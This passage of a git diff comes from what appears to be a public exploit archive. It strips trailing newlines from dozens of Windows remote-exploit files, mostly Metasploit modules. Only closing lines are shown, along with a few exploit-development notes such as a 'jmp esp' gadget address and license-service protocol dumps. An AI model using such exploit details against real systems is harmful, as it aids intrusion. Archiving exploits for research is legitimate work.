a/platforms/windows/remote/16693.rb b/platforms/windows/remote/16693.rb index f77b69299..247bad83f 100755 --- a/platforms/windows/remote/16693.rb +++ b/platforms/windows/remote/16693.rb @@ -120,4 +120,4 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16694.rb b/platforms/windows/remote/16694.rb index d9d696115..295ea5596 100755 --- a/platforms/windows/remote/16694.rb +++ b/platforms/windows/remote/16694.rb @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16695.rb b/platforms/windows/remote/16695.rb index 5e9bba312..af8936ae9 100755 --- a/platforms/windows/remote/16695.rb +++ b/platforms/windows/remote/16695.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16696.rb b/platforms/windows/remote/16696.rb index 0ee130c1d..01bda8585 100755 --- a/platforms/windows/remote/16696.rb +++ b/platforms/windows/remote/16696.rb @@ -125,4 +125,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16697.rb b/platforms/windows/remote/16697.rb index fa178ae08..9a160b061 100755 --- a/platforms/windows/remote/16697.rb +++ b/platforms/windows/remote/16697.rb @@ -157,4 +157,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16698.rb b/platforms/windows/remote/16698.rb index aa7cfb4a2..f8389cf15 100755 --- a/platforms/windows/remote/16698.rb +++ b/platforms/windows/remote/16698.rb @@ -347,5 +347,4 @@ class Metasploit3 < Msf::Exploit::Remote rand_text_alphanumeric(rand(128)+4) end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16699.rb b/platforms/windows/remote/16699.rb index afe8eaa73..60c6f99a6 100755 --- a/platforms/windows/remote/16699.rb +++ b/platforms/windows/remote/16699.rb @@ -478,5 +478,4 @@ class Metasploit3 < Msf::Exploit::Remote return buf end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16700.rb b/platforms/windows/remote/16700.rb index 554cae031..afbeae0e9 100755 --- a/platforms/windows/remote/16700.rb +++ b/platforms/windows/remote/16700.rb @@ -505,5 +505,4 @@ class Metasploit3 < Msf::Exploit::Remote return buf end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16701.rb b/platforms/windows/remote/16701.rb index 639a98186..77d1a93c1 100755 --- a/platforms/windows/remote/16701.rb +++ b/platforms/windows/remote/16701.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16702.rb b/platforms/windows/remote/16702.rb index f225e5ca0..2c261fde5 100755 --- a/platforms/windows/remote/16702.rb +++ b/platforms/windows/remote/16702.rb @@ -101,4 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16703.rb b/platforms/windows/remote/16703.rb index e026c3be1..d0fd1ebe3 100755 --- a/platforms/windows/remote/16703.rb +++ b/platforms/windows/remote/16703.rb @@ -68,4 +68,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16704.rb b/platforms/windows/remote/16704.rb index ee5dc7846..1a4262be6 100755 --- a/platforms/windows/remote/16704.rb +++ b/platforms/windows/remote/16704.rb @@ -98,5 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16705.rb b/platforms/windows/remote/16705.rb index 4d704f405..70d0a6ebb 100755 --- a/platforms/windows/remote/16705.rb +++ b/platforms/windows/remote/16705.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16706.rb b/platforms/windows/remote/16706.rb index fad8f1498..56d61442c 100755 --- a/platforms/windows/remote/16706.rb +++ b/platforms/windows/remote/16706.rb @@ -85,4 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16707.rb b/platforms/windows/remote/16707.rb index d149c7d92..ffb87ba51 100755 --- a/platforms/windows/remote/16707.rb +++ b/platforms/windows/remote/16707.rb @@ -101,4 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16708.rb b/platforms/windows/remote/16708.rb index 67d629334..6f9d43734 100755 --- a/platforms/windows/remote/16708.rb +++ b/platforms/windows/remote/16708.rb @@ -121,4 +121,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(client) service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16709.rb b/platforms/windows/remote/16709.rb index a29f7da1d..83013b504 100755 --- a/platforms/windows/remote/16709.rb +++ b/platforms/windows/remote/16709.rb @@ -68,4 +68,4 @@ class Metasploit3 < Msf::Exploit::Remote client.put(buffer) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16710.rb b/platforms/windows/remote/16710.rb index c5b97725c..b9bba677a 100755 --- a/platforms/windows/remote/16710.rb +++ b/platforms/windows/remote/16710.rb @@ -92,4 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16711.rb b/platforms/windows/remote/16711.rb index 1e7d4e136..250005666 100755 --- a/platforms/windows/remote/16711.rb +++ b/platforms/windows/remote/16711.rb @@ -126,4 +126,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16712.rb b/platforms/windows/remote/16712.rb index 543287d99..cc052ba1a 100755 --- a/platforms/windows/remote/16712.rb +++ b/platforms/windows/remote/16712.rb @@ -83,4 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16713.rb b/platforms/windows/remote/16713.rb index 64d0fae78..cd83ca1f3 100755 --- a/platforms/windows/remote/16713.rb +++ b/platforms/windows/remote/16713.rb @@ -88,4 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16715.rb b/platforms/windows/remote/16715.rb index 58f4c1c17..39f80372b 100755 --- a/platforms/windows/remote/16715.rb +++ b/platforms/windows/remote/16715.rb @@ -191,4 +191,4 @@ class Metasploit3 < Msf::Exploit::Remote return (res and res =~ /^500/) ? true : false end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16716.rb b/platforms/windows/remote/16716.rb index 98734b82b..6a7955be5 100755 --- a/platforms/windows/remote/16716.rb +++ b/platforms/windows/remote/16716.rb @@ -104,5 +104,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16717.rb b/platforms/windows/remote/16717.rb index e33172643..45ae102b2 100755 --- a/platforms/windows/remote/16717.rb +++ b/platforms/windows/remote/16717.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16718.rb b/platforms/windows/remote/16718.rb index c46883d65..71059d0de 100755 --- a/platforms/windows/remote/16718.rb +++ b/platforms/windows/remote/16718.rb @@ -83,4 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16719.rb b/platforms/windows/remote/16719.rb index 0ca8fe4e8..da8a49057 100755 --- a/platforms/windows/remote/16719.rb +++ b/platforms/windows/remote/16719.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16720.rb b/platforms/windows/remote/16720.rb index d3916b456..0bd90c299 100755 --- a/platforms/windows/remote/16720.rb +++ b/platforms/windows/remote/16720.rb @@ -101,4 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16721.rb b/platforms/windows/remote/16721.rb index f44542bc6..87e8302fe 100755 --- a/platforms/windows/remote/16721.rb +++ b/platforms/windows/remote/16721.rb @@ -112,4 +112,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16722.rb b/platforms/windows/remote/16722.rb index ccfaf77b8..7259d7396 100755 --- a/platforms/windows/remote/16722.rb +++ b/platforms/windows/remote/16722.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16723.rb b/platforms/windows/remote/16723.rb index 2736654fb..4ab581fe5 100755 --- a/platforms/windows/remote/16723.rb +++ b/platforms/windows/remote/16723.rb @@ -241,4 +241,4 @@ end puts "unable to find a valid solution!" exit(1) -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16724.rb b/platforms/windows/remote/16724.rb index f27bcc22f..e9980c9e3 100755 --- a/platforms/windows/remote/16724.rb +++ b/platforms/windows/remote/16724.rb @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16725.rb b/platforms/windows/remote/16725.rb index 82bcd8f57..ec5b8ffa5 100755 --- a/platforms/windows/remote/16725.rb +++ b/platforms/windows/remote/16725.rb @@ -91,5 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16727.rb b/platforms/windows/remote/16727.rb index 47152c9f9..88593289e 100755 --- a/platforms/windows/remote/16727.rb +++ b/platforms/windows/remote/16727.rb @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16728.rb b/platforms/windows/remote/16728.rb index 77521bab8..125f1aabf 100755 --- a/platforms/windows/remote/16728.rb +++ b/platforms/windows/remote/16728.rb @@ -110,5 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote return end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16729.rb b/platforms/windows/remote/16729.rb index 2e3f16b44..2d5fb3f6b 100755 --- a/platforms/windows/remote/16729.rb +++ b/platforms/windows/remote/16729.rb @@ -73,4 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16730.rb b/platforms/windows/remote/16730.rb index 652c272be..4ecffd681 100755 --- a/platforms/windows/remote/16730.rb +++ b/platforms/windows/remote/16730.rb @@ -107,4 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16732.rb b/platforms/windows/remote/16732.rb index 0a27a254f..5844a62cd 100755 --- a/platforms/windows/remote/16732.rb +++ b/platforms/windows/remote/16732.rb @@ -245,4 +245,4 @@ also present in 1.5 (presumably all versions in between) 177 if(client.serve.debug) 178 printf(af); -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16733.rb b/platforms/windows/remote/16733.rb index f2baa367e..6daab9897 100755 --- a/platforms/windows/remote/16733.rb +++ b/platforms/windows/remote/16733.rb @@ -66,4 +66,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16734.rb b/platforms/windows/remote/16734.rb index 5e8ed0469..37f6f6c40 100755 --- a/platforms/windows/remote/16734.rb +++ b/platforms/windows/remote/16734.rb @@ -124,4 +124,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16735.rb b/platforms/windows/remote/16735.rb index 9a5f1e9aa..660af4546 100755 --- a/platforms/windows/remote/16735.rb +++ b/platforms/windows/remote/16735.rb @@ -111,4 +111,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16736.rb b/platforms/windows/remote/16736.rb index f3c6aabb6..3b856464b 100755 --- a/platforms/windows/remote/16736.rb +++ b/platforms/windows/remote/16736.rb @@ -86,4 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16737.rb b/platforms/windows/remote/16737.rb index 97d1b95b3..482ac335b 100755 --- a/platforms/windows/remote/16737.rb +++ b/platforms/windows/remote/16737.rb @@ -130,4 +130,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16739.rb b/platforms/windows/remote/16739.rb index 0e084c286..09ddb9b89 100755 --- a/platforms/windows/remote/16739.rb +++ b/platforms/windows/remote/16739.rb @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16740.rb b/platforms/windows/remote/16740.rb index e6cf8c4b8..3d6ee1221 100755 --- a/platforms/windows/remote/16740.rb +++ b/platforms/windows/remote/16740.rb @@ -175,5 +175,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16741.rb b/platforms/windows/remote/16741.rb index f152642ea..02eb2e01c 100755 --- a/platforms/windows/remote/16741.rb +++ b/platforms/windows/remote/16741.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16742.rb b/platforms/windows/remote/16742.rb index 03bb87a81..330740425 100755 --- a/platforms/windows/remote/16742.rb +++ b/platforms/windows/remote/16742.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16744.rb b/platforms/windows/remote/16744.rb index 4e66923ed..5df2c09e3 100755 --- a/platforms/windows/remote/16744.rb +++ b/platforms/windows/remote/16744.rb @@ -151,5 +151,4 @@ end eTrust: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1> BrightStor: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> -=end - +=end \ No newline at end of file diff --git a/platforms/windows/remote/16745.rb b/platforms/windows/remote/16745.rb index 3126a126b..dfe05ef47 100755 --- a/platforms/windows/remote/16745.rb +++ b/platforms/windows/remote/16745.rb @@ -119,5 +119,4 @@ end eTrust: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1> BrightStor: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> -=end - +=end \ No newline at end of file diff --git a/platforms/windows/remote/16746.rb b/platforms/windows/remote/16746.rb index 78266c17c..9274f6496 100755 --- a/platforms/windows/remote/16746.rb +++ b/platforms/windows/remote/16746.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16747.rb b/platforms/windows/remote/16747.rb index f042a1d4a..7d7de431a 100755 --- a/platforms/windows/remote/16747.rb +++ b/platforms/windows/remote/16747.rb @@ -156,5 +156,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16748.rb b/platforms/windows/remote/16748.rb index add210baa..21b215236 100755 --- a/platforms/windows/remote/16748.rb +++ b/platforms/windows/remote/16748.rb @@ -289,4 +289,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16749.rb b/platforms/windows/remote/16749.rb index fb3d572f5..13a49bcca 100755 --- a/platforms/windows/remote/16749.rb +++ b/platforms/windows/remote/16749.rb @@ -222,4 +222,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16750.rb b/platforms/windows/remote/16750.rb index 5d82b8472..aff7eb762 100755 --- a/platforms/windows/remote/16750.rb +++ b/platforms/windows/remote/16750.rb @@ -153,5 +153,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16752.rb b/platforms/windows/remote/16752.rb index cbc47f3be..c083d283d 100755 --- a/platforms/windows/remote/16752.rb +++ b/platforms/windows/remote/16752.rb @@ -98,5 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote }, 2) handler end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16753.rb b/platforms/windows/remote/16753.rb index 8e3dbd371..b99cd6c16 100755 --- a/platforms/windows/remote/16753.rb +++ b/platforms/windows/remote/16753.rb @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16754.rb b/platforms/windows/remote/16754.rb index 60e24d4e2..4f2c29295 100755 --- a/platforms/windows/remote/16754.rb +++ b/platforms/windows/remote/16754.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16755.rb b/platforms/windows/remote/16755.rb index 2dfd76024..4ba1e0c19 100755 --- a/platforms/windows/remote/16755.rb +++ b/platforms/windows/remote/16755.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16756.rb b/platforms/windows/remote/16756.rb index 72861cc65..9514abff7 100755 --- a/platforms/windows/remote/16756.rb +++ b/platforms/windows/remote/16756.rb @@ -115,4 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16757.rb b/platforms/windows/remote/16757.rb index cd80f7993..48da08545 100755 --- a/platforms/windows/remote/16757.rb +++ b/platforms/windows/remote/16757.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16758.rb b/platforms/windows/remote/16758.rb index 9a8fc43e0..0c2cad390 100755 --- a/platforms/windows/remote/16758.rb +++ b/platforms/windows/remote/16758.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16760.rb b/platforms/windows/remote/16760.rb index c0e166a14..86d74614d 100755 --- a/platforms/windows/remote/16760.rb +++ b/platforms/windows/remote/16760.rb @@ -79,4 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote }, 2) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16761.rb b/platforms/windows/remote/16761.rb index 5d6581fcc..33d29a090 100755 --- a/platforms/windows/remote/16761.rb +++ b/platforms/windows/remote/16761.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16762.rb b/platforms/windows/remote/16762.rb index 6c384bbd6..7549d91f2 100755 --- a/platforms/windows/remote/16762.rb +++ b/platforms/windows/remote/16762.rb @@ -83,5 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16764.rb b/platforms/windows/remote/16764.rb index 0882d26dc..b25eb13e8 100755 --- a/platforms/windows/remote/16764.rb +++ b/platforms/windows/remote/16764.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16765.rb b/platforms/windows/remote/16765.rb index 9bafa9aae..9c9460689 100755 --- a/platforms/windows/remote/16765.rb +++ b/platforms/windows/remote/16765.rb @@ -88,4 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16766.rb b/platforms/windows/remote/16766.rb index 5c0140e6b..b8e2e5b05 100755 --- a/platforms/windows/remote/16766.rb +++ b/platforms/windows/remote/16766.rb @@ -87,4 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote select(nil,nil,nil,4) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16767.rb b/platforms/windows/remote/16767.rb index 836342f4b..ad6faae54 100755 --- a/platforms/windows/remote/16767.rb +++ b/platforms/windows/remote/16767.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16768.rb b/platforms/windows/remote/16768.rb index 50493bf55..1f0b3388a 100755 --- a/platforms/windows/remote/16768.rb +++ b/platforms/windows/remote/16768.rb @@ -107,4 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16769.rb b/platforms/windows/remote/16769.rb index a28a77308..5b35b3161 100755 --- a/platforms/windows/remote/16769.rb +++ b/platforms/windows/remote/16769.rb @@ -78,4 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16770.rb b/platforms/windows/remote/16770.rb index bdeeaabcd..0ab9f033c 100755 --- a/platforms/windows/remote/16770.rb +++ b/platforms/windows/remote/16770.rb @@ -127,4 +127,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16771.rb b/platforms/windows/remote/16771.rb index ff18e0a6a..5bb911823 100755 --- a/platforms/windows/remote/16771.rb +++ b/platforms/windows/remote/16771.rb @@ -129,4 +129,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16772.rb b/platforms/windows/remote/16772.rb index dd1d3d217..5c8a1933c 100755 --- a/platforms/windows/remote/16772.rb +++ b/platforms/windows/remote/16772.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16773.rb b/platforms/windows/remote/16773.rb index c9beafc85..ee98ff165 100755 --- a/platforms/windows/remote/16773.rb +++ b/platforms/windows/remote/16773.rb @@ -75,4 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16774.rb b/platforms/windows/remote/16774.rb index 5becc5ba1..4eeaa4254 100755 --- a/platforms/windows/remote/16774.rb +++ b/platforms/windows/remote/16774.rb @@ -202,4 +202,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16775.rb b/platforms/windows/remote/16775.rb index 1edbaa777..bf7145b7c 100755 --- a/platforms/windows/remote/16775.rb +++ b/platforms/windows/remote/16775.rb @@ -136,4 +136,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16776.rb b/platforms/windows/remote/16776.rb index 4e9595a4c..a43eae86b 100755 --- a/platforms/windows/remote/16776.rb +++ b/platforms/windows/remote/16776.rb @@ -116,5 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16777.rb b/platforms/windows/remote/16777.rb index 3d040701e..81c2d9d0b 100755 --- a/platforms/windows/remote/16777.rb +++ b/platforms/windows/remote/16777.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16778.rb b/platforms/windows/remote/16778.rb index 6e4600e60..98b435327 100755 --- a/platforms/windows/remote/16778.rb +++ b/platforms/windows/remote/16778.rb @@ -132,4 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16779.rb b/platforms/windows/remote/16779.rb index 8a83a1929..30ec4bd66 100755 --- a/platforms/windows/remote/16779.rb +++ b/platforms/windows/remote/16779.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16781.rb b/platforms/windows/remote/16781.rb index b284e02cd..378d68775 100755 --- a/platforms/windows/remote/16781.rb +++ b/platforms/windows/remote/16781.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16785.rb b/platforms/windows/remote/16785.rb index 25ca9d5f1..6dab4570b 100755 --- a/platforms/windows/remote/16785.rb +++ b/platforms/windows/remote/16785.rb @@ -80,4 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16787.rb b/platforms/windows/remote/16787.rb index 37d065a59..6b17db7f1 100755 --- a/platforms/windows/remote/16787.rb +++ b/platforms/windows/remote/16787.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16791.rb b/platforms/windows/remote/16791.rb index eb8d2b0c1..70f9a18ce 100755 --- a/platforms/windows/remote/16791.rb +++ b/platforms/windows/remote/16791.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16792.rb b/platforms/windows/remote/16792.rb index cf2416c9f..7e397fca3 100755 --- a/platforms/windows/remote/16792.rb +++ b/platforms/windows/remote/16792.rb @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16793.rb b/platforms/windows/remote/16793.rb index cf141c474..825225fa2 100755 --- a/platforms/windows/remote/16793.rb +++ b/platforms/windows/remote/16793.rb @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16794.rb b/platforms/windows/remote/16794.rb index c9f5bc553..987b10c10 100755 --- a/platforms/windows/remote/16794.rb +++ b/platforms/windows/remote/16794.rb @@ -260,4 +260,4 @@ also present in 1.5 (presumably all versions in between) 177 if(client.serve.debug) 178 printf(af); -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16796.rb b/platforms/windows/remote/16796.rb index 37adfb939..1a1a3da45 100755 --- a/platforms/windows/remote/16796.rb +++ b/platforms/windows/remote/16796.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16797.rb b/platforms/windows/remote/16797.rb index c67a80d89..074407c5b 100755 --- a/platforms/windows/remote/16797.rb +++ b/platforms/windows/remote/16797.rb @@ -109,4 +109,4 @@ end 1:014> u 0x5a01d78d L1 ov!OVHelpAPI+0x18d: 5a01d78d ffe4 jmp esp <- jmp esp for 7.53, will update in a sec. -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16798.rb b/platforms/windows/remote/16798.rb index 1e5f4cfc0..11b5066e0 100755 --- a/platforms/windows/remote/16798.rb +++ b/platforms/windows/remote/16798.rb @@ -108,4 +108,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16799.rb b/platforms/windows/remote/16799.rb index dc679adf3..6f27c4e34 100755 --- a/platforms/windows/remote/16799.rb +++ b/platforms/windows/remote/16799.rb @@ -129,4 +129,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/168.c b/platforms/windows/remote/168.c index 81b6ae45a..013904eb0 100755 --- a/platforms/windows/remote/168.c +++ b/platforms/windows/remote/168.c @@ -294,4 +294,4 @@ fprintf (stderr, "# make sure we are in, dude :)\n\n"); return 0; } -// milw0rm.com [2004-03-28] +// milw0rm.com [2004-03-28] \ No newline at end of file diff --git a/platforms/windows/remote/16800.rb b/platforms/windows/remote/16800.rb index 7a73bc525..04243d172 100755 --- a/platforms/windows/remote/16800.rb +++ b/platforms/windows/remote/16800.rb @@ -92,5 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16801.rb b/platforms/windows/remote/16801.rb index 7c5a0703f..0c4a55a87 100755 --- a/platforms/windows/remote/16801.rb +++ b/platforms/windows/remote/16801.rb @@ -88,4 +88,4 @@ class 